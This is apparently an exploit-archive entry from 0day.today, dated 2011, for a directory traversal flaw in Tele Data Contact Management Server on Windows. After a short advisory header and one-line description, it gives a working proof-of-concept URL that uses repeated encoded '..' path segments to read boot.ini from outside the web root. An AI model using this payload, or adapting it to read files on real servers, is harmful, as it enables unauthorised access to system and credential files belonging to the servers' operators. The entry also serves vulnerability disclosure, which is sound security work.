Tele Data Contact Management Server Directory Traversal

2011-06-10T00:00:00
ID 1337DAY-ID-16301
Type zdt
Reporter AutoSec Tools
Modified 2011-06-10T00:00:00

Description

Exploit for windows platform in category web applications

                                        
                                            ------------------------------------------------------------------------
Software................Tele Data Contact Management Server
Vulnerability...........Directory Traversal
Threat Level............Serious (3/5)
Download................http://teledata.qc.ca/td_cms/
Discovery Date..........6/1/2011
Tested On...............Windows XP SP3 EN
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
Email...................John Leitch <[email protected]<script type="text/javascript">
/* <![CDATA[ */
(function(){try{var s,a,i,j,r,c,l=document.getElementById("__cf_email__");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
/* ]]> */
</script>>
------------------------------------------------------------------------
 
 
--Description--
 
A directory traversal vulnerability in Tele Data Contact Management
Server can be exploited to read files outside of the web root.
 
 
--PoC--
 
http://localhost/%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../boot.ini



#  0day.today [2018-03-28]  #